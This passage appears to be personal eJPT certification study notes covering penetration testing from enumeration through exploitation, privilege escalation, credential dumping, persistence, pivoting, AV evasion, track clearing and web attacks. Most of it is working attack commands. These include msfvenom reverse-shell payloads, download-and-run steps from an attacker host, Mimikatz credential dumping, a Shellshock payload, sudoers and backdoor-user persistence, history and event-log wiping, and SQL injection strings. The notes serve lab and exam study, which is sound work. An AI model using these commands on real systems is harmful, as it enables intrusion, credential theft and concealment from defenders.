hydra -L users.txt -P unix_passwords.txt <IP> -t 4 ftp   # Hydra alternative

SMB (445)

Copyuse auxiliary/scanner/smb/smb_version / smb_enumusers / smb_enumshares / smb_login
smbclient -L \\\\<IP>\\ -U <user>        # List shares
smbmap -u guest -p "" -H <IP>            # Guest null session
enum4linux -a <IP>                        # Full auto-enum
crackmapexec smb <IP> -u admin -p '<pw>' --shares --users --groups

HTTP (80/443)

Copyuse auxiliary/scanner/http/http_version / http_header / robots_txt / dir_scanner / http_login
# One-liner: crawl all robots.txt paths
target="<IP>"; curl -s "$target/robots.txt" | awk '/^(Disallow|Allow):/ {print $2}' | xargs -I{} sh -c 'echo "==> {}"; curl -s "$0{}"' "$target"

MySQL (3306)

Copyuse auxiliary/scanner/mysql/mysql_login / mysql_enum / mysql_sql / mysql_hashdump / mysql_schemadump
mysql -h <IP> -u root                     # Try root with no password

SSH (22) / SMTP (25)

Copyuse auxiliary/scanner/ssh/ssh_version / ssh_login / ssh_enumusers
use auxiliary/scanner/smtp/smtp_version / smtp_enum

Vulnerability Assessment

Copynmap --script smb-vuln-ms17-010 -p 445 <IP>      # EternalBlue
nmap --script http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" <IP>
use auxiliary/scanner/smb/smb_ms17_010             # MSF EternalBlue check
use post/multi/recon/local_exploit_suggester       # Post-exploit vuln scan

# WMAP web scanner in MSF
load wmap && wmap_sites -a <IP> && wmap_targets -t <URL> && wmap_run -e && wmap_vulns -l

Auditing Fundamentals

Lifecycle: Planning → Info Gathering → Risk Assessment → Execution → Analysis → Reporting → Remediation

Key Frameworks: NIST CSF (Identify/Protect/Detect/Respond/Recover), ISO 27001 (ISMS), PCI DSS (payment cards), HIPAA (healthcare US), GDPR (personal data EU), CIS Controls, NIST 800-53

Lynis - Linux security auditing:

Copycd /opt && wget https://downloads.cisofy.com/lynis/lynis-3.1.6.tar.gz && tar -xzf lynis-3.1.6.tar.gz && cd lynis
./lynis audit system

Tags: #ejpt #assessment-methodologies #nmap #enumeration #scanning #information-gathering

📘 Domain 2: Host & Network Penetration Testing

eJPT Domain Coverage: System/Host-Based Attacks, Windows & Linux Exploitation, Privilege Escalation, Credential Dumping, Metasploit Framework, Network-Based Attacks, AV Evasion
Source: INE PTS Course Notes (Jan-May 2026)
Exam Weight: The core of the eJPT. This domain covers everything from initial exploitation to full system compromise.

2.1 Windows Vulnerabilities Overview

Windows dominates market share (~70%+), making it the primary target. Common vulnerability types: buffer overflows, RCE, privilege elevation, information disclosure, and DoS.

Frequently Exploited Windows Services

2.2 Exploiting Windows Services

SMB with PsExec

Use case: After brute-forcing SMB credentials, PsExec gives you a SYSTEM shell. This was the primary attack vector in Exploitation CTF 2.

Copy# Brute-force SMB credentials
msfconsole
use auxiliary/scanner/smb/smb_login
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
set RHOSTS <TARGET>
set VERBOSE false
exploit

# Authenticate and get SYSTEM shell via PsExec
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass <password>
set RHOSTS <TARGET>
exploit

# Alternative: psexec.py from Impacket (outside MSF)
python3 /usr/share/doc/python3-impacket/examples/psexec.py Administrator@<TARGET>

# Alternative: crackmapexec for quick command execution
crackmapexec smb <TARGET> -u Administrator -p '<password>' -x "whoami"

EternalBlue (MS17-010)

Use case: Affects SMBv1 on Windows 7/2008/2012. Gives SYSTEM immediately without credentials. Always check for this - it's an exam favorite.

Copy# Check if vulnerable
nmap --script smb-vuln-ms17-010 -p 445 <TARGET>

# Exploit via Metasploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <TARGET>
run
# Result: NT AUTHORITY\SYSTEM meterpreter session

RDP Exploitation

Use case: Brute-force RDP credentials, check for BlueKeep (CVE-2019-0708), connect via xfreerdp.

Copy# Detect RDP
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS <TARGET>
set RPORT 3389    # or custom port like 3333

# Brute-force RDP
hydra -L <userlist> -P <passlist> rdp://<TARGET> -s <PORT>

# Connect with credentials
xfreerdp /u:<USER> /p:<PASS> /v:<TARGET>:<PORT>

WinRM Exploitation

Port 5985/5986. Use case: Remote PowerShell access. If you find valid creds, evil-winrm gives you an interactive session.

Copy# Brute-force WinRM
use auxiliary/scanner/winrm/winrm_login
set USER_FILE <userlist>
set PASS_FILE <passlist>
set RHOSTS <TARGET>

# Execute commands
use auxiliary/scanner/winrm/winrm_cmd
set USERNAME <USER>
set PASSWORD <PASS>
set CMD whoami

# Get a full Meterpreter session
use exploit/windows/winrm/winrm_script_exec
set USERNAME <USER>
set PASSWORD <PASS>
set FORCE_VBS true    # required for execution

WebDAV Exploitation

Use case: IIS + WebDAV = file upload to web root = RCE. Brute-force creds → test upload types with davtest → upload ASP/ASPX shell → trigger via browser.

Copy# Detect WebDAV
nmap -sC -p80 --script=http-enum <TARGET>

# Brute-force WebDAV credentials
hydra -L <userlist> -P <passlist> <TARGET> http-get /webdav/

# Test what file types can be uploaded
davtest -auth <user>:<pass> -url http://<TARGET>/webdav

# Upload a web shell via cadaver
cadaver http://<TARGET>/webdav
put /usr/share/webshells/asp/webshell.asp

# Generate an ASPX Meterpreter payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=1234 -f asp > shell.asp

2.3 Windows Privilege Escalation

Kernel Exploits

Workflow: systeminfo on target → save to file → run Windows-Exploit-Suggester → find matching exploit.

Copy# In Meterpreter - quick checks
getuid                    # current user
getprivs                  # current privileges
getsystem                 # auto-attempt privesc (try this first!)

# Automated exploit suggestion
use post/multi/recon/local_exploit_suggester
set SESSION <number>
run

# Manual: Windows-Exploit-Suggester
# On target: systeminfo > sysinfo.txt
# On attack box:
./windows-exploit-suggester.py --database <latest.xlsx> --systeminfo sysinfo.txt
# E = PoC code exists, M = Metasploit module available

UAC Bypass with UACMe

Use case: You're a local admin but getsystem fails because UAC blocks elevation. UACMe abuses Windows AutoElevate to bypass UAC.

Copy# Generate payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=4444 -f exe > backdoor.exe

# Start listener (new MSF console)
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <IP>
set LPORT 4444
run

# In existing Meterpreter session - upload and execute
cd C:\\Users\\<user>\\AppData\\Local\\Temp
upload backdoor.exe
upload /root/Desktop/tools/UACME/Akagi64.exe
shell
.\Akagi64.exe 23 C:\Users\<user>\AppData\Local\Temp\backdoor.exe
# Key 23 = UAC bypass method. Launches backdoor.exe elevated.

# On listener - elevated session arrives
migrate <lsass_PID>    # migrate to SYSTEM process
hashdump               # dump all password hashes

Access Token Impersonation

Use case: Steal tokens from logged-in users to impersonate them. The incognito module lists available tokens.

Copy# In Meterpreter
load incognito
list_tokens -u                                    # list available user tokens
impersonate_token "ATTACKDEFENSE\Administrator"   # steal admin token
impersonate_token "NT AUTHORITY\SYSTEM"           # steal SYSTEM token
# After impersonation, migrate to a process owned by that user
pgrep explorer
migrate <PID>

SeImpersonatePrivilege → PrintSpoofer

Use case: If whoami /priv shows SeImpersonatePrivilege, use PrintSpoofer for instant SYSTEM. This was the exact path in Post-Exploitation CTF 2.

Copy# Check privileges
whoami /priv

# Transfer PrintSpoofer to target
scp PrintSpoofer64.exe <user>@<TARGET>:"C:\Users\<user>\"

# Execute for SYSTEM shell
PrintSpoofer64.exe -i -c cmd
# -i = interactive, -c cmd = launch command prompt as SYSTEM

2.4 Windows Credential Dumping

Key tools: Meterpreter hashdump, Kiwi (built-in Mimikatz), standalone Mimikatz. Remember: john --format=NT for NTLM hashes.

Copy# Meterpreter - quick hash dump
hashdump

# Kiwi extension (built-in Mimikatz)
load kiwi
creds_all                # dump all credentials
lsa_dump_sam             # dump SAM database (local accounts)
lsa_dump_secrets         # dump LSA secrets

# Standalone Mimikatz
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
shell
mimikatz.exe
privilege::debug
lsadump::sam
lsadump::secrets
sekurlsa::logonpasswords   # cleartext passwords from memory

Pass-the-Hash

Use case: Use NTLM hashes directly for authentication - no cracking needed.

Copy# Via MSF PsExec
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass <LM_HASH:NTLM_HASH>
run

# Via crackmapexec
crackmapexec smb <TARGET> -u Administrator -H "<NTLM_HASH>" -x "whoami"

2.5 Linux Exploitation

ProFTPD mod_copy

Use case: ProFTPD 1.3.5 allows unauthenticated file copy. Set SITEPATH to the web root. Used in Exploitation CTF 3.

Copyuse exploit/unix/ftp/proftpd_modcopy_exec
set RHOSTS <TARGET>
set SITEPATH /var/www/html    # must be web-accessible directory
run

vsftpd 2.3.4 Backdoor

Copyuse exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS <TARGET>
run

Samba usermap_script

Use case: Samba 3.0.20 - classic RCE via username map script vulnerability.

Copysearchsploit samba 3.0.20
use exploit/linux/samba/is_known_pipename
# or: use exploit/multi/samba/usermap_script
set RHOSTS <TARGET>
run

Shellshock (CVE-2014-6271)

Use case: Targets Bash via CGI scripts on Apache. Inject commands through the User-Agent header. Look for .cgi endpoints.

Copy# Detect
nmap -sV --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" <TARGET>

# Exploit via Metasploit
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set TARGETURI /gettime.cgi
set RHOSTS <TARGET>
run

# Manual via Burp - set User-Agent to:
() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'

SSH - libssh Auth Bypass

Use case: libssh 0.8.3 authentication bypass. Used in Post-Exploitation CTF 1.

Copyuse exploit/linux/ssh/libssh_auth_bypass
set RHOSTS <TARGET>
set SPAWN_PTY true    # critical - gives interactive shell
run

2.6 Linux Privilege Escalation

Enumeration Checklist

Copysudo -l                                    # what can I run as root?
find / -perm -4000 -type f 2>/dev/null     # SUID binaries
cat /etc/crontab && ls /etc/cron.d/        # cron jobs
find / -not -type l -perm -o+w 2>/dev/null # world-writable files
uname -r                                   # kernel version
cat /etc/passwd                            # user accounts
cat /etc/shadow                            # password hashes (if readable!)

SUID Binary Exploitation

Use case: If find has SUID bit set, you get instant root. Cross-reference SUID binaries with GTFOBins.

Copy# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Analyze a suspicious SUID binary
file <binary>
strings <binary>    # look for called programs you can hijack

# GTFOBins find escape - instant root shell
find . -exec /bin/sh \; -quit

# Hijack a called binary
rm <called_binary>
cp /bin/bash <called_binary>
./<suid_binary>

Cron Job Exploitation

Use case: If a cron job runs a script as root and you can modify that script, inject commands for root access.

Copycrontab -l                          # list user cron jobs
cat /etc/crontab                    # system cron jobs
ls -la /etc/cron.d/                 # cron.d entries
cat /etc/cron.d/*                   # read all cron definitions

# Hijack a writable cron script to add yourself to sudoers
printf '#!/bin/bash\necho "<USER> ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/<script>

Writable /etc/shadow

Use case: If /etc/shadow is world-writable, generate a hash and replace root's password. Used in Post-Exploitation CTF 1.

Copy# Check if shadow is writable
find / -not -type l -perm -o+w 2>/dev/null | grep shadow

# Generate a new password hash
openssl passwd -1 newpassword

# Edit shadow file - replace root's hash (between first two colons)
nano /etc/shadow

# Switch to root
su root

2.7 Linux Credential Dumping

Copycat /etc/passwd                    # user accounts (always readable)
cat /etc/shadow                    # password hashes (requires root)

# Hash type indicators (in shadow file):
# $1 = MD5, $2 = Blowfish, $5 = SHA-256, $6 = SHA-512

# Metasploit automated dump
use post/linux/gather/hashdump
set SESSION <number>
run

# Crack with John
john --format=sha512crypt shadow_hashes.txt --wordlist=rockyou.txt

# Crack within Metasploit
use auxiliary/analyze/crack_linux
set SHA512 true
run

2.8 Metasploit Framework

Core Workflow

Copyservice postgresql start && msfconsole -q

# Setup workspace
workspace -a <project_name>

# Import Nmap results or scan from MSF
db_import <nmap_output.xml>
db_nmap -sS -sV -O <TARGET>

# Search → Use → Configure → Exploit
search <keyword>
use <module_path>
show options
set RHOSTS <TARGET>
set LHOST <YOUR_IP>
run

Session Management

Copysessions                    # list active sessions
sessions -i <number>        # interact with session
sessions -u <number>        # upgrade shell → Meterpreter
sessions -k <number>        # kill session
background                  # background current session (or Ctrl+Z)

Meterpreter Essential Commands

Copysysinfo                     # system information
getuid                      # current user
getprivs                    # current privileges
getsystem                   # attempt auto-privesc
hashdump                    # dump password hashes
shell                       # drop to system shell
upload <local> <remote>     # upload file to target
download <remote> <local>   # download file from target
migrate <PID>               # migrate to another process
ps                          # list processes
search -f *.txt             # search for files

Payload Generation with msfvenom

Copy# Windows EXE (64-bit)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=1234 -f exe > shell.exe

# Windows ASPX (for IIS/WebDAV upload)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=1234 -f aspx > shell.aspx

# Linux ELF (64-bit)
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=1234 -f elf > shell
chmod +x shell

# Encoded payload (AV evasion - basic)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=1234 -e x86/shikata_ga_nai -i 10 -f exe > encoded.exe

# Handler to catch callbacks
use multi/handler
set payload <same_as_msfvenom>
set LHOST <IP>
set LPORT 1234
run

2.9 Network-Based Attacks

Wireshark Filters

Copyip.addr == <IP>                          # filter by any IP
ip.src == <IP>                           # source IP only
ip.dest == <IP>                          # destination IP only
tcp.port == 80                           # filter by port
http.request.method==POST                # find form submissions (passwords!)
tcp.flags.syn == 1 and tcp.flags.ack ==0 # SYN-only packets (port scan detection)
http contains password                   # search for password strings
ftp                                      # all FTP traffic (cleartext creds)

ARP Poisoning (MITM)

Copy# Enable IP forwarding (critical - or you cause DoS)
echo 1 > /proc/sys/net/ipv4/ip_forward

# Poison ARP tables in both directions
arpspoof -i eth1 -t <TARGET_IP> -r <GATEWAY_IP>

# Capture traffic with Wireshark on the same interface

SMB Relay Attack

Copy# MSF: set up relay to capture and forward NTLM auth
use exploit/windows/smb/smb_relay
set SRVHOST <YOUR_IP>
set SMBHOST <TARGET_IP>

# Combine with ARP spoofing + DNS spoofing for full MITM
echo "<YOUR_IP> *.targetdomain.com" > dns
dnsspoof -i eth1 -f dns

2.10 Pivoting

Critical eJPT skill. Access internal machines through a compromised host that sits on both networks.

Copy# Add route through compromised host
run autoroute -s <INTERNAL_SUBNET>/24

# Port scan internal target through the pivot
background
use auxiliary/scanner/portscan/tcp
set RHOSTS <INTERNAL_TARGET>
run

# Port forwarding - make internal port accessible locally
portfwd add -l <LOCAL_PORT> -p <TARGET_PORT> -r <INTERNAL_TARGET>
db_nmap -sV -p <LOCAL_PORT> localhost

# SOCKS proxy for tools outside MSF (proxychains)
use auxiliary/server/socks_proxy
set VERSION 4a
set SRVPORT 9050
run
# In new terminal:
proxychains nmap <INTERNAL_TARGET> -sT -Pn -sV -p 445

2.11 AV Evasion

Shellter (32-bit PE injection)

Copysudo apt-get install shellter wine32
cp /usr/share/windows-binaries/vncviewer.exe .
sudo wine shellter.exe
# Operation Mode: A (automatic)
# PE Target: vncviewer.exe
# Stealth Mode: Y
# Payload: L (listed) → 1 (meterpreter_reverse_tcp)

Invoke-Obfuscation (PowerShell)

Copygit clone https://github.com/danielbohannon/Invoke-Obfuscation.git
cd Invoke-Obfuscation
pwsh
Import-Module ./Invoke-Obfuscation.psd1
Invoke-Obfuscation

🔗 Related Notes

• 01-Assessment-Methodologies
• 03-Post-Exploitation
• 📋 Methodology Overview
• CheatSheets/Windows Privesc Cheat Sheet
• CheatSheets/Linux Privesc Cheat Sheet
• CheatSheets/Reverse Shells Cheat Sheet

Tags: #ejpt #exploitation #windows #linux #privesc #metasploit #credential-dumping #pivoting #av-evasion

📘 Domain 3: Post-Exploitation

eJPT Domain Coverage: Local Enumeration (Win/Linux), File Transfer, Shell Upgrades, Privilege Escalation, Persistence, Credential Dumping, Pivoting, Clearing Tracks
Source: INE PTS Course Notes (Jan-May 2026)
Exam Weight: What you do after getting a shell determines whether you capture all the flags. Enumerate everything, escalate, dump creds, pivot to internal targets.

3.1 Post-Exploitation Methodology

Structured approach - follow this order on every compromised host:

1. Local Enumeration - system info, users, groups, network, processes, cron jobs
2. File Transfer (as needed) - get tools onto the target
3. Shell Upgrade (as needed) - upgrade to Meterpreter or interactive TTY
4. Privilege Escalation - get root/SYSTEM
5. Persistence - maintain access across reboots
6. Credential Dumping - harvest hashes and passwords
7. Pivoting - access internal networks through the compromised host
8. Clearing Tracks - remove artifacts and evidence

3.2 Windows Local Enumeration

System Information

Copy# Meterpreter
sysinfo                    # OS, architecture, hostname in one shot
getuid                     # current user account

# Windows shell
hostname                   # machine name
systeminfo                 # full system details (OS, hotfixes, arch)
wmic qfe get Caption,Description,HotFixID,InstalledOn    # installed patches

Users & Groups

Copy# Meterpreter
getuid                     # who am I?
getprivs                   # what privileges do I have?

# Windows shell
whoami                     # current user
whoami /priv               # current privileges (look for SeImpersonate!)
query user                 # currently logged-on users
net users                  # list all user accounts
net user administrator     # details on a specific user
net localgroup             # list all groups
net localgroup administrators    # who's in the admin group?

Network Information

Copy# Meterpreter
ipconfig                   # network interfaces
route                      # routing table
arp                        # ARP cache

# Windows shell
ipconfig /all              # full interface details (DNS, DHCP, gateway)
route print                # routing table
arp -a                     # ARP cache (other hosts on the network)
netstat -ano               # active connections and listening ports with PIDs
netsh advfirewall show allprofiles    # firewall state

Processes & Services

Copy# Meterpreter
ps                         # list all processes
pgrep explorer.exe         # find PID of a specific process
migrate <PID>              # migrate to another process
migrate -N explorer.exe    # migrate by process name

# Windows shell
net start                  # list running services
wmic service list brief    # services with details
tasklist /SVC              # processes and their associated services
schtasks /query /fo LIST   # scheduled tasks
schtasks /query /fo LIST /v    # verbose scheduled task details

Automated Enumeration

Copy# MSF post modules - run after setting SESSION
use post/windows/gather/win_privs          # check UAC/privileges
use post/windows/gather/enum_logged_on_users
use post/windows/gather/checkvm
use post/windows/gather/enum_applications
use post/windows/gather/enum_computers
use post/windows/gather/enum_patches
use post/windows/gather/enum_shares

# JAWS - PowerShell enumeration script (https://github.com/411Hall/JAWS)
upload jaws-enum.ps1
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename jaws-enum.txt

# PrivescCheck - identifies privilege escalation vectors (https://github.com/itm4n/PrivescCheck)
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

3.3 Linux Local Enumeration

System Information

Copycat /etc/issue              # distribution info
cat /etc/*release           # detailed OS version
hostname                    # machine name
uname -a                   # hostname, kernel version, architecture
uname -r                   # kernel version only (for exploit matching)
env                         # environment variables (PATH, creds sometimes)
lscpu                       # CPU info
df -h                       # disk usage
lsblk | grep sd             # storage devices and partitions
dpkg -l                     # installed packages (Debian/Ubuntu)

Users & Groups

Copywhoami                      # current user
id                          # uid, gid, groups
groups root                 # what groups is root in?
cat /etc/passwd             # all user accounts (/sbin/nologin = service account)
cat /etc/passwd | grep -v /nologin    # filter to real users only
ls /home                    # user home directories
w                           # currently logged-in users (if installed)
who                         # active sessions
last                        # login history
lastlog                     # last login for each user

Network Information

Copyip a s                      # network interfaces (modern)
ifconfig                    # network interfaces (legacy)
netstat -antp               # TCP connections with PIDs
ss -tnl                     # listening TCP ports (modern)
route                       # routing table
arp -a                      # ARP cache
cat /etc/hosts              # local DNS overrides (flags hide here!)
cat /etc/resolv.conf        # DNS nameserver
cat /etc/networks           # network configuration

Processes & Cron Jobs

Copyps aux                      # all running processes
ps aux | grep root          # processes running as root
top                         # dynamic process viewer
pgrep <name>                # find PID of a process

# Cron jobs - check ALL of these locations
crontab -l                  # current user's cron jobs
cat /etc/crontab            # system cron table
ls -al /etc/cron*           # cron directories
cat /etc/cron.d/*           # cron.d entries

Automated Enumeration

Copy# MSF post modules
use post/linux/gather/enum_configs
use post/linux/gather/enum_network
use post/linux/gather/enum_system
use post/linux/gather/checkvm

# LinEnum - bash enumeration script (https://github.com/rebootuser/LinEnum)
upload LinEnum.sh /tmp/LinEnum.sh
shell
chmod +x /tmp/LinEnum.sh
./tmp/LinEnum.sh

3.4 File Transfer Techniques

Setting Up a Web Server (Attack Machine)

Copypython3 -m http.server 80           # Python 3
python -m SimpleHTTPServer 80        # Python 2 (legacy)

Downloading to Windows Targets

Copy# certutil - built into Windows, most reliable
certutil -urlcache -f http://<ATTACKER_IP>/file.exe file.exe

# PowerShell - alternative
powershell -c "Invoke-WebRequest http://<ATTACKER_IP>/file.exe -OutFile file.exe"
powershell -c "(New-Object Net.WebClient).DownloadFile('http://<ATTACKER_IP>/file.exe','file.exe')"

# SCP - if SSH is running on target
scp file.exe <user>@<TARGET>:"C:\Users\<user>\file.exe"

# Meterpreter - direct upload
upload /local/path/file.exe C:\\remote\\path\\file.exe

Downloading to Linux Targets

Copy# wget - most common
wget http://<ATTACKER_IP>/file.sh

# curl - alternative
curl http://<ATTACKER_IP>/file.sh -o file.sh

# Meterpreter - direct upload
upload /local/path/file.sh /tmp/file.sh

3.5 Upgrading Shells

Command Shell → Meterpreter (MSF)

Copy# Automatic upgrade
sessions -u <session_number>

# Manual upgrade
background
use post/multi/manage/shell_to_meterpreter
set SESSION <number>
set LHOST <YOUR_IP>
run

Spawning Interactive TTY Shells

Use case: Basic shells lack tab completion, arrow keys, and can't run su or sudo. Upgrade immediately after landing.

Copy# Python (most common)
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'

# Perl
perl -e 'exec "/bin/bash";'

# Then stabilize the shell:
export TERM=xterm          # enables clear, arrow keys
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin
export SHELL=bash

# Full stabilization (background the shell first with Ctrl+Z):
stty raw -echo; fg
# Then set terminal size:
stty rows <number>
stty cols <number>

3.6 Persistence

Windows Persistence

Copy# Service-based backdoor (requires admin)
use exploit/windows/local/persistence_service
set SESSION <number>
set payload windows/meterpreter/reverse_tcp
run
# Save the cleanup .rc script path - use it later to remove the backdoor

# Enable RDP for persistent GUI access
use post/windows/manage/enable_rdp
set SESSION <number>
run

# Keylogging
keyscan_start              # start capturing keystrokes
keyscan_dump               # view captured keystrokes
keyscan_stop               # stop capturing

Linux Persistence

Copy# Create a new user with root privileges
useradd -m backdoor -s /bin/bash
passwd backdoor
usermod -aG root backdoor
usermod -u 15 backdoor     # change UID to blend in

# SSH key persistence
use post/linux/manage/sshkey_persistence
set CREATESSHFOLDER true
set SESSION <number>
run
# Test: ssh -i <key_file> root@<TARGET>

# Cron job persistence (as root)
crontab -e
# Add: * * * * * /tmp/reverse_shell.sh

3.7 Credential Dumping & Cracking

Windows NTLM Hashes

Copy# Meterpreter
hashdump                   # dump SAM database hashes
migrate -N lsass.exe       # migrate to LSASS first for best results
load kiwi
creds_all                  # all credentials
lsa_dump_sam               # SAM hashes
lsa_dump_secrets           # LSA secrets

# Mimikatz (standalone)
upload mimikatz.exe
shell
mimikatz.exe
privilege::debug
lsadump::sam
sekurlsa::logonpasswords   # cleartext passwords from memory

# Crack NTLM hashes
john --format=NT hashes.txt --wordlist=rockyou.txt
hashcat -a 0 -m 1000 hashes.txt rockyou.txt -O

Linux Password Hashes

Copycat /etc/shadow            # requires root

# Hash type indicators:
# $1 = MD5, $2 = Blowfish, $5 = SHA-256, $6 = SHA-512

# MSF automated dump
use post/linux/gather/hashdump
set SESSION <number>
run
loot                       # view dumped hashes

# Crack
john --format=sha512crypt hashes.txt --wordlist=rockyou.txt
hashcat -a 0 -m 1800 hashes.txt rockyou.txt

3.8 Pivoting

Critical eJPT skill. After compromising a host on the edge network, use it to reach internal hosts you couldn't access directly.

Copy# Step 1: Add route through compromised host
run autoroute -s <INTERNAL_SUBNET>/CIDR
run autoroute -p             # verify routes

# Step 2: Scan internal target through the pivot
background
use auxiliary/scanner/portscan/tcp
set RHOSTS <INTERNAL_TARGET>
set PORTS 1-100
run

# Step 3: Port forward to interact with specific services
sessions -i <session>
portfwd add -l 1234 -p 80 -r <INTERNAL_TARGET>
# Now scan: nmap -sV -p 1234 localhost

# Step 4: SOCKS proxy for external tools
use auxiliary/server/socks_proxy
set VERSION 4a
set SRVPORT 9050
run
# New terminal: proxychains nmap <INTERNAL_TARGET> -sT -Pn -sV -p 445

# Step 5: Exploit internal target
use exploit/windows/http/badblue_passthru
set payload windows/meterpreter/bind_tcp    # bind, not reverse (going through pivot)
set RHOSTS <INTERNAL_TARGET>
run

3.9 Clearing Tracks

Windows

Copy# Store artifacts in C:\Temp - easy to clean up
cd C:\\ && mkdir Temp && cd Temp

# Remove uploaded files
rm <file>

# Remove persistence (use the .rc cleanup script)
resource <cleanup_script.rc>

# Clear Windows Event Logs (use sparingly - destroys client data)
clearev

Linux

Copy# Store artifacts in /tmp - cleared on reboot

# Clear bash history
history -c                           # clear current session
cat /dev/null > ~/.bash_history      # wipe history file

# Remove uploaded files
rm /tmp/<uploaded_files>

3.10 Social Engineering (Overview)

Exam relevance: The eJPT tests conceptual understanding of social engineering, not practical execution.

Key techniques: Phishing, spear phishing, pretexting, vishing, smishing, baiting, tailgating

GoPhish - open-source phishing framework for simulating phishing campaigns
- GitHub: github.com/gophish/gophish
- Creates landing pages, tracks email opens/clicks, manages campaigns

🔗 Related Notes

• 02-Host-Network-Penetration-Testing
• 04-Web-Application-Pentesting
• 📋 Methodology Overview
• CheatSheets/Windows Privesc Cheat Sheet
• CheatSheets/Linux Privesc Cheat Sheet

Tags: #ejpt #post-exploitation #enumeration #privesc #persistence #credential-dumping #pivoting #file-transfer

📘 Domain 4: Web Application Penetration Testing

eJPT Domain Coverage: Web Application Security, HTTP Fundamentals, Directory Enumeration, LFI/RFI, SQL Injection, XSS, Login Brute-Forcing, CMS Exploitation (WordPress, Drupal), Burp Suite, OWASP ZAP
Source: INE PTS Course Notes (Jan-May 2026)
Exam Weight: The final section of the eJPT. Tests LFI, directory enumeration, login brute-forcing, SQL injection, and CMS attacks. Remember Web App CTF 1: LFI → dirb → Hydra → SQLi.

4.1 Web Application Architecture

Key concept: Web apps follow client-server architecture. The client (browser) sends HTTP requests, the server processes them and returns HTTP responses. Understanding this flow is essential for finding injection points.

Client-Side Technologies

Server-Side Technologies

Data Interchange

4.2 HTTP Fundamentals

HTTP Request Methods

HTTP Status Codes

Key Commands

Copy# Verbose request - see full request/response headers
curl -v http://target.ine.local

# HEAD request - headers only (quick fingerprint)
curl -I http://target.ine.local

# Specify request method
curl -v -X OPTIONS http://target.ine.local

# POST request with form data
curl -X POST http://target.ine.local/login.php -d "name=john&password=password" -v

# Upload a file via PUT
curl http://target.ine.local/uploads/ --upload-file shell.php

# Delete a file
curl -X DELETE http://target.ine.local/uploads/shell.php -v

HTTPS

HTTPS = HTTP + SSL/TLS encryption. Protects data in transit but does NOT protect against application-level attacks (SQLi, XSS, LFI). The encryption only secures the transport layer.

4.3 Web Enumeration & Scanning

Directory Brute-Forcing

Use case: Find hidden directories, admin panels, backup files, and sensitive paths the site doesn't link to publicly. This was Flag 2 in Web App CTF 1 - dirb found the /secured/ directory.

Copy# dirb - simple, uses built-in wordlist by default
dirb http://<TARGET>
dirb http://<TARGET> /usr/share/wordlists/dirb/big.txt

# gobuster - faster, more options
gobuster dir -u http://<TARGET> -w /usr/share/wordlists/dirb/common.txt -b 403,404
# Search for specific file extensions
gobuster dir -u http://<TARGET> -w /usr/share/wordlists/dirb/common.txt -x .php,.txt,.bak,.zip -r

# ffuf - another fast fuzzer
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://<TARGET>/FUZZ -mc 200,301
ffuf -w wordlist.txt -u http://<TARGET>/FUZZ -e .php,.txt,.html

Web Technology Fingerprinting

Copywhatweb http://<TARGET>                    # identify CMS, frameworks, server
nikto -h http://<TARGET> -o nikto.txt      # vulnerability scan

Robots.txt & Sitemap

Copycurl http://<TARGET>/robots.txt            # hidden directories
curl http://<TARGET>/sitemap.xml           # full site structure

Crawling & Spidering

Burp Suite - passive crawling via proxy. Set FoxyProxy to route traffic through Burp, then browse the site manually. The Site Map builds automatically.
OWASP ZAP - active spidering. Tools → Spider → select target. Green entries are on-page, others are external.

4.4 Web Application Attacks

Local File Inclusion (LFI)

Use case: When a URL parameter loads a file (e.g., ?file=page.txt), inject path traversal sequences to read files outside the intended directory. This was Flag 1 in Web App CTF 1.

Copy# Normal URL
http://<TARGET>/view_file?file=file1.txt

# Path traversal to read /flag.txt from the root
http://<TARGET>/view_file?file=../../flag.txt

# Read system files
http://<TARGET>/view_file?file=../../etc/passwd
http://<TARGET>/view_file?file=../../etc/shadow

# Read application config files
http://<TARGET>/view_file?file=../../var/www/html/wp-config.php

SQL Injection (SQLi)

Use case: Inject SQL into input fields to bypass authentication, extract data, or execute commands. Flag 4 in Web App CTF 1 used admin'-- for auth bypass.

Authentication Bypass

Copy# In the username field - closes the query string, comments out password check
admin'--
admin' OR 1=1--
admin' OR '1'='1'--

# In the password field (use any value)
anything

SQLMap (Automated)

Copy# Test a GET parameter
sqlmap -u "http://<TARGET>/page.php?id=1" -p id

# Test a POST form
sqlmap -u "http://<TARGET>/login.php" --data="user=admin&password=admin"

# From a Burp request file
sqlmap -r request.txt -p <parameter>

# Enumerate databases
sqlmap -u "http://<TARGET>/page.php?id=1" --dbs

# Dump specific table
sqlmap -u "http://<TARGET>/page.php?id=1" -D <database> -T <table> --dump

# Get an OS shell (if privileges allow)
sqlmap -u "http://<TARGET>/page.php?id=1" --os-shell

Cross-Site Scripting (XSS)

Use case: Inject JavaScript into web pages viewed by other users. Test every input field.

Copy// Basic test - if this pops an alert, it's vulnerable
<script>alert("XSS")</script>

// Cookie stealing payload (for session hijacking)
